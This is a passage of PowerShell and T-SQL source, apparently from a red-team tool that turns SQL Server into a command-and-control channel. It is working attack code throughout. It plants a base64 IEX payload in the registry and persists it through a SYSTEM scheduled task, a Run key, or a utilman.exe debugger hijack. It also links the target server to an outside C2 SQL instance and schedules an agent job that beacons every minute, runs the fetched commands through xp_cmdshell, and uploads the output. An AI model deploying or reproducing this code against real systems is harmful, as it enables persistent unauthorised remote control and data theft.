: Verified $Database database exists or was created." + }else{ + Write-Verbose "$instance : Access or creation of $Database database failed." + return + } + + Write-Verbose "$instance : Creating the C2 Table in the database $Database." + + # Create Database Query + $Query = " + If not Exists (SELECT name FROM sys.tables WHERE name = 'C2COMMANDS') + CREATE TABLE [C2COMMANDS] + ( + [cid] int IDENTITY(1,1) PRIMARY KEY, + [servername]varchar(MAX), + [command]varchar(MAX), + [result]varchar(MAX), + [status]varchar(MAX), + [lastupdate]DateTime default (Getdate()) + ); + + If not Exists (SELECT name FROM sys.tables WHERE name = 'C2AGENTS') + CREATE TABLE [C2AGENTS] + ( + [aid] int IDENTITY(1,1) PRIMARY KEY, + [servername]varchar(MAX), + [agentype]varchar(MAX), + [lastcheckin]DateTime default (Getdate()), + );SELECT name FROM sys.tables WHERE name = 'C2COMMANDS'" + + # Create Database results + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database "$Database" -SuppressVerbose + $RowCount = $TblResults | Measure-Object | select Count -ExpandProperty count + if($RowCount -eq 1) + { + Write-Verbose "$instance : Verified C2 tables existed or were created in the $Database." + }else{ + Write-Verbose "$instance : C2 tables creation failed in the $Database failed." + } + + } + + End + { + # Return data + # $TblResults + } +} + + +# ---------------------------------- +# Install-SQLC2AgentPs +# ---------------------------------- +# Author: Scott Sutherland +Function Install-SQLC2AgentPs +{ + <# + .SYNOPSIS + This functions installs a C2 Agent on the target SQL Server by creating a server link + to the C2 SQL Server, then it creates a TSQL SQL Agent job that uses the link to download + commands from the C2 server and executes them. By default is execute OS command using xp_cmdshell. + This requires sysadmin privileges on the target server. + .PARAMETER Instance + C2 SQL Server instance to connection to. + .PARAMETER Username + C2 SQL Server or domain account to authenticate with. + .PARAMETER Password + C2 SQL Server or domain account password to authenticate with. + .PARAMETER DatabaseName + Database name that contains target table on C2. + .PARAMETER Type + Type of persistence method to use. + .EXAMPLE + Connecting using current Windows credentials. + PS C:\> Install-SQLC2AgentPs -Verbose -Instance cloudserver1.database.windows.net -Username sa -Pasword password! -Database database1 + .EXAMPLE + Connecting using current Windows credentials. + PS C:\> Install-SQLC2AgentPs -Verbose -Type Task -Instance cloudserver1.database.windows.net -Username sa -Pasword password! -Database database1 + #> + [CmdletBinding()] + Param( + + [Parameter(Mandatory = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'C2 SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $true, + HelpMessage = 'C2 SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $true, + HelpMessage = 'C2 SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $true, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table on C2 SQL Server.')] + [string]$Database, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Type of persistence method to use.')] + [ValidateSet("Task","RegRun","RegUtilman")] + [string]$Type = "Task", + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + } + + Process + { + # check for admin privs - pending + + # ------------------------------------ + # Gather SQLC2 functions + # ------------------------------------ + Write-Verbose " - Creating SQLC2AgentPS command." + + # Setup script variable + $psscript = "" + + Get-ChildItem -Path Function:\ | + Where-Object name -like "*SQLC2*" | + Where-Object -FilterScript { + $_.name -notlike '*:*' + } | + Select-Object -Property name -ExpandProperty name | + ForEach-Object -Process { + + # Get the function code + $Definition = Get-Content -Path "function:\$_" -ErrorAction Stop + + # $Definition + $CurrentFunction = "Function $_ `n { $Definition }" + + # Add function + $psscript = "$psscript `n $CurrentFunction" + } + + # ------------------------------------ + # Create SQLC2 command and store it + # ------------------------------------ + + # my command + $SQLC2Command = "Get-SQLC2Command -Username $Username -Password $Password -Instance $Instance -Database $Database -Verbose -Execute" + + # Add custom command + $psscript = "$psscript `n`n $SQLC2Command" + + # Encode command + $psscript64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($psscript)) | Out-Null + + # Write command to the registry and drop IoCs + Write-Verbose " - Attempting to write SQLC2AgentPS payload to registry keys." + if(Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\") + { + Write-Verbose " - Keys already exist." + }else{ + + # Write keys + try{ + New-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ -Name SQLC2AgentPS –Force | Out-Null + New-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\ -Name DisplayName -Value "SQLC2AgentPS" –Force | Out-Null + New-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\ -Name DisplayIcon -Value "C:\Windows\System32\ComputerDefaults.exe" –Force | Out-Null + New-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\ -Name Command -Value "$psscript64" –Force -PropertyType MultiString | Out-Null + New-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\ -Name Publisher -Value "Bad Person" –Force | Out-Null + New-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\ -Name UninstallPath -Value "c:\windows\system32\calc.exe" –Force | Out-Null + New-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\ -Name UninstallString -Value "c:\windows\system32\calc.exe" –Force | Out-Null + Write-Verbose " - Keys created." + }catch{ + Write-Verbose " - Unable to write SQLC2AgentPS payload to the registry." + return + } + } + + # PowerShell Arguments + $PersistCommand = " -NoProfile -WindowStyle Hidden -C `"IEX([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS' -Name Command).Command)))`"" + + # ------------------------------------ + # Create scheduled task + # ------------------------------------ + if($Type -eq "Task"){ + Write-Verbose " - Attempting to create SQLC2AgentPS scheduled task." + if((Get-ScheduledTask -TaskName "SQLC2AgentPS*" | Measure-Object | Select Count -ExpandProperty Count) -eq 0) + { + try{ + $SystemSID = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::LocalSystemSid, $null); + $SystemAccountName = $SystemSID.Translate([System.Security.Principal.NTAccount]).Value.ToString(); + $Action = New-ScheduledTaskAction –Execute "powershell.exe" -Argument $PersistCommand -WorkingDirectory "C:\windows\system32\WindowsPowerShell\v1.0\" + $Trigger = New-ScheduledTaskTrigger -AtLogon + $Principal = New-ScheduledTaskPrincipal -UserID $SystemAccountName -LogonType ServiceAccount -RunLevel Highest + $Settings = New-ScheduledTaskSettingsSet + $Object = New-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -Settings $Settings + Register-ScheduledTask "SQLC2AgentPS" -InputObject $Object | Out-Null + Write-Verbose " - Task created." + }catch{ + Write-Verbose " - Failed to create SQLC2AgentPS scheduled task." + } + }else{ + Write-Verbose " - Task already exists." + } + } + + <# + # ------------------------------------ + # Create WMI Subscription - pending updates + # ------------------------------------ + # “SELECT * FROM __InstanceModificationEvent Where TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Second=5” + Write-Verbose " - Attempting to create SQLC2AgentPS WMI subscription." + + # Create filter (trigger) + $Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{ + EventNamespace = "root\cimv2" + Name = "SQLC2AgentPS_Filter" + Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" + QueryLanguage = "WQL" + } + + # Create consumer (the command to run) + $Command = "PowerShell.exe $PersistCommand" + $Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{ + Name = "SQLC2AgentPS_Consumer" + CommandLineTemplate = $Command + } + + # Create binding (connecting the trigger and command to run) + Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{ + Name = "SQLC2AgentPS_Binding" + Filter = $Filter + Consumer = $Consumer + } + #> + + # ------------------------------------ + # Create registry run + # ------------------------------------ + if($Type -eq "RegRun"){ + Write-Verbose " - Attempting to create SQLC2AgentPS registry run key." + $Command = "PowerShell.exe $PersistCommand" + + # Check if property exists + try{ + Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ -Name SQLC2AgentPS -ErrorAction Stop | Out-Null + Write-Verbose " - Key already exists." + $RunCheck = 1 + }catch{ + $RunCheck = 0 + } + + # Add property + if ($RunCheck -eq 0){ + + try{ + New-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ -Name SQLC2AgentPS -Value "$Command" –Force | Out-Null + Write-Verbose " - Key created." + }catch{ + Write-Verbose " - Failed to create registry run key." + } + } + } + + # ------------------------------------ + # Create registry utilman.exe debugger + # ------------------------------------ + if($Type -eq "RegUtilman"){ + Write-Verbose " - Attempting to create SQLC2AgentPS registry key for utilman.exe debugger." + $Command = "PowerShell.exe $PersistCommand" + if(Test-Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\") + { + Write-Verbose " - Key already exists." + }else{ + + # Write the key + try{ + New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" -Name UtilMan.exe –Force | Out-Null + New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UtilMan.exe" -Name Debugger -Value "$Command" –Force | Out-Null + Write-Verbose " - Key created." + }catch{ + Write-Verbose " - Failed to create registry key for utilman.exe debugger." + } + } + } + } + + End + { + } +} + + +# ---------------------------------- +# Install-SQLC2AgentLink +# ---------------------------------- +# Author: Scott Sutherland +# Todo: Fix handling of multi-line command output. +Function Install-SQLC2AgentLink +{ + <# + .SYNOPSIS + This functions installs a C2 Agent on the target SQL Server by creating a server link + to the C2 SQL Server, then it creates a TSQL SQL Agent job that uses the link to download + commands from the C2 server and executes them. By default is execute OS command using xp_cmdshell. + This requires sysadmin privileges on the target server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER C2Username + SQL Server or domain account to authenticate with. + .PARAMETER C2Password + SQL Server or domain account password to authenticate with. + .PARAMETER C2Instance + SQL Server C2 instance to connection to. + .PARAMETER C2DatabaseName + Database name that contains target table on C2. + .EXAMPLE + Connecting using current Windows credentials. + PS C:\> Install-SQLC2AgentLink -Instance "SQLServer1\STANDARDDEV2014" -C2Instance cloudserver1.database.windows.net -C2Username user -C2Password password -C2Database database1 + .EXAMPLE + Connecting using sa SQL server login. + PS C:\> Install-SQLC2AgentLink -Instance "SQLServer1\STANDARDDEV2014" -Username sa -Pasword password! -C2Instance cloudserver1.database.windows.net -C2Username user -C2Password password -C2Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'C2 SQL Server instance to connection to.')] + [string]$C2Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server login or domain account to the authenticate to the C2 SQL Server with.')] + [string]$C2Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server login domain account password to authenticate to the C2 SQL Server with.')] + [string]$C2Password, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table on C2 SQL Server.')] + [string]$C2Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + + # Test connection + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # ---------------------------- + # Create SQL Server link + # ---------------------------- + + # Generate random name for server link - needs to be random + $RandomLink = "SQLC2Server" + + # Create SQL Server link query + $Query = " + -- Create Server Link C2 Server + IF (SELECT count(*) FROM master..sysservers WHERE srvname = '$RandomLink') = 0 + EXEC master.dbo.sp_addlinkedserver @server = N'$RandomLink', + @srvproduct=N'', + @provider=N'SQLNCLI', + @datasrc=N'$C2Instance', + @catalog=N'$C2Database' + + -- Associate credentials with the server link + IF (SELECT count(*) FROM master..sysservers WHERE srvname = '$RandomLink') = 1 + EXEC master.dbo.sp_addlinkedsrvlogin @rmtsrvname=N'$RandomLink', + @useself=N'False', + @locallogin=NULL, + @rmtuser=N'$C2Username', + @rmtpassword='$C2Password' + + -- Configure the server link + IF (SELECT count(*) FROM master..sysservers WHERE srvname = '$RandomLink') = 1 + EXEC master.dbo.sp_serveroption @server=N'$RandomLink', @optname=N'data access', @optvalue=N'true' + + --IF (SELECT count(*) FROM master..sysservers WHERE srvname = '$RandomLink') = 1 + EXEC master.dbo.sp_serveroption @server=N'$RandomLink', @optname=N'rpc', @optvalue=N'true' + + --IF (SELECT count(*) FROM master..sysservers WHERE srvname = '$RandomLink') = 1 + EXEC master.dbo.sp_serveroption @server=N'$RandomLink', @optname=N'rpc out', @optvalue=N'true' + + -- Verify addition of link + IF (SELECT count(*) FROM master..sysservers WHERE srvname = '$RandomLink') = 1 + SELECT 1 + ELSE + SELECT 0 + " + + # Run Query + Write-Verbose "$instance : Creating server link named '$RandomLink' as $C2Username to $C2Instance " + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -TimeOut 300 + + # Verify link addition + if(($TblResults | Select Column1 -ExpandProperty Column1) -eq 1) + { + Write-Verbose "$instance : Confirmed server link named $RandomLink was added." + }else{ + Write-Verbose "$instance : The server link could not be created." + return + } + + # ------------------------------- + # Create SQL Server Agent Job + # ------------------------------- + + # Generate random name for the SQL Agent Job + Write-Verbose "$instance : Creating SQL Agent Job on $Instance." + Write-Verbose "$instance : The agent will beacon to $C2Instance every minute." + + # Create SQL Server agent job + $Query = " + + /****** Object: Job [SQLC2 Agent Job] Script Date: 5/21/2018 12:23:40 PM ******/ + BEGIN TRANSACTION + DECLARE @ReturnCode INT + SELECT @ReturnCode = 0 + /****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 5/21/2018 12:23:40 PM ******/ + IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) + BEGIN + EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' + IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + + END + + DECLARE @jobId BINARY(16) + EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'SQLC2 Agent Job', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=0, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=N'NT AUTHORITY\SYSTEM', @job_id = @jobId OUTPUT + IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + /****** Object: Step [Run command] Script Date: 5/21/2018 12:23:40 PM ******/ + EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'Run command', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'TSQL', + @command=N' + + -- Query server link - Register the agent + IF not Exists (SELECT * FROM [$RandomLink].$C2Database.dbo.C2Agents WHERE servername = (select @@SERVERNAME)) + INSERT [$RandomLink].$C2Database.dbo.C2Agents (servername,agentype) VALUES ((select @@SERVERNAME),''ServerLink'') + ELSE + UPDATE [$RandomLink].$C2Database.dbo.C2Agents SET lastcheckin = (select GETDATE ()) + WHERE servername like (select @@SERVERNAME) + + -- Get the pending commands for this server from the C2 SQL Server + DECLARE @output TABLE (cid int,servername varchar(8000),command varchar(8000)) + INSERT @output (cid,servername,command) SELECT cid,servername,command FROM [$RandomLink].$C2Database.dbo.C2Commands WHERE status like ''pending'' and servername like @@servername + + -- Run all the command for this server + WHILE (SELECT count(*) FROM @output) > 0 + BEGIN + + -- Setup variables + DECLARE @CurrentCid varchar (8000) -- current cid + DECLARE @CurrentCmd varchar (8000) -- current command + DECLARE @xpoutput TABLE ([rid] int IDENTITY(1,1) PRIMARY KEY,result varchar(max)) -- xp_cmdshell output table + DECLARE @result varchar(8000) -- xp_cmdshell output value + + -- Get first command in the list - need to add cid + SELECT @CurrentCid = (SELECT TOP 1 cid FROM @output) + SELECT @CurrentCid as cid + SELECT @CurrentCmd = (SELECT TOP 1 command FROM @output) + SELECT @CurrentCmd as command + + -- Run the command - not command output break when multiline - need fix, and add cid + INSERT @xpoutput (result) exec master..xp_cmdshell @CurrentCmd + SET @result = (select top 1 result from @xpoutput) + select @result as result + + -- Upload results to C2 SQL Server - need to add cid + Update [$RandomLink].$C2Database.dbo.C2Commands set result = @result, status=''success'' + WHERE servername like @@SERVERNAME and cid like @CurrentCid + + -- Clear the command result history + DELETE FROM @xpoutput + + -- Remove first command + DELETE TOP (1) FROM @output + END', + @database_name=N'master', + @flags=0 + IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 + IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + EXEC @ReturnCode = msdb.dbo.sp_add_jobschedule @job_id=@jobId, @name=N'SQLC2 Agent Schedule', + @enabled=1, + @freq_type=4, + @freq_interval=1, + @freq_subday_type=4, + @freq_subday_interval=1, + @freq_relative_interval=0, + @freq_recurrence_factor=0, + @active_start_date=20180521, + @active_end_date=99991231, + @active_start_time=0, + @active_end_time=235959, + @schedule_uid=N'9eb66fdb-70d6-4ccf-8b60-a97431487e88' + IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' + IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + COMMIT TRANSACTION + GOTO EndSave + QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION + EndSave: + + -- Script: Get-AgentJob.sql + -- Description: Return a list of agent jobs. + -- Reference: https://msdn.microsoft.com/en-us/library/ms189817.aspx + + SELECT SUSER_SNAME(owner_sid) as [JOB_OWNER], + job.job_id as [JOB_ID], + name as [JOB_NAME], + description as [JOB_DESCRIPTION], + step_name, + command, + enabled, + server, + database_name, + date_created + FROM [msdb].[dbo].[sysjobs] job + INNER JOIN [msdb].[dbo].[sysjobsteps] steps + ON job.job_id = steps.job_id + WHERE name like 'SQLC2 Agent Job' + ORDER BY JOB_OWNER,JOB_NAME" + + # Run Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database 'msdb' -SuppressVerbose -TimeOut 300 + + # Verify job was added + if(($TblResults | Measure-Object | select count -ExpandProperty count) -eq 1) + { + Write-Verbose "$instance : Confirmed the job named 'SQLC2 Agent Job' was added." + }else{ + Write-Verbose "$instance : The agent job could not be created or already exists." + Write-Verbose "$instance : You will have to remove the SQL Server link 'SQLC2Server." + return + } + + Write-Verbose "$instance : Done." + } + + End + { + # Return data + # $TblResults + } +} + + +# ---------------------------------- +# Register-SQLC2Agent +# ---------------------------------- +# Author: Scott Sutherland +Function Register-SQLC2Agent +{ + <# + .SYNOPSIS + This command should be run on the c2 agent system so it can send a keep alive to the server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name that contains target table. + .PARAMETER Table + Table name to that contains target column. + .PARAMETER Column + Column that contains the TSQL command to run. + .EXAMPLE + PS C:\> Register-SQLC2Agent -Instance "SQLServer1\STANDARDDEV2014" -Database database1 + PS C:\> Register-SQLC2Agent -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + $TblDatabases = New-Object -TypeName System.Data.DataTable + $null = $TblDatabases.Columns.Add('ServerName') + $null = $TblDatabases.Columns.Add('Command') + $null = $TblDatabases.Columns.Add('Status') + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup query to grab commands + $Query = " + -- checkin as agent + IF not Exists (SELECT * FROM dbo.C2Agents WHERE servername = '$env:COMPUTERNAME') + INSERT dbo.C2Agents (servername,agentype) VALUES ('$env:COMPUTERNAME','PsProcess') + ELSE + UPDATE dbo.C2Agents SET lastcheckin = (select GETDATE ()) + WHERE servername like '$env:COMPUTERNAME'" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + + Write-Verbose "$instance : $env:COMPUTERNAME agent registered/checked in." + } + + End + { + # Return data + $TblResults + } +} + + +# ---------------------------------- +# Get-SQLC2Agent +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLC2Agent +{ + <# + .SYNOPSIS + This command should be run against the C2 SQLserver and will return a list of agents. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name that contains target table. + .PARAMETER Table + Table name to that contains target column. + .PARAMETER Column + Column that contains the TSQL command to run. + .EXAMPLE + PS C:\> Get-SQLC2Agent-Instance "SQLServer1\STANDARDDEV2014" -Database database1 + PS C:\> Get-SQLC2Agent -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup query to grab commands + $Query = "SELECT * FROM dbo.c2agents" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + $AgentCount = $TblResults | measure | select count -ExpandProperty count + + Write-Verbose -Message "$Instance : $AgentCount agents were found registered." + } + + End + { + # Return data + $TblResults + } +} + + +# ---------------------------------- +# Set-SQLC2Command +# ---------------------------------- +# Author: Scott Sutherland +Function Set-SQLC2Command +{ + <# + .SYNOPSIS + This functions stores a command in the C2COMMAND table of the C2 SQL Server. + This command should be run against the C2 SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name that contains target table. + .PARAMETER ServerName + ServerName to run the command on. By default it is all nodes. + .PARAMETER Command + Command to run on the agent. + .EXAMPLE + PS C:\> Set-SQLC2Command -Instance "SQLServer1\STANDARDDEV2014" -Database database1 -Command 'whoami' -ServerName host1 + PS C:\> Set-SQLC2Command -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 -Command 'whoami' -ServerName host1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'ServerName of the agent.')] + [string]$ServerName, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Command to run on the agent.')] + [string]$Command, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + $TblDatabases = New-Object -TypeName System.Data.DataTable + $null = $TblDatabases.Columns.Add('ServerName') + $null = $TblDatabases.Columns.Add('Command') + $null = $TblDatabases.Columns.Add('Status') + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + + # Setup agent node filtering based on servername + If(-not $ServerName){ + $ServerName = "All" + } + + # Test connection + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose "$instance : 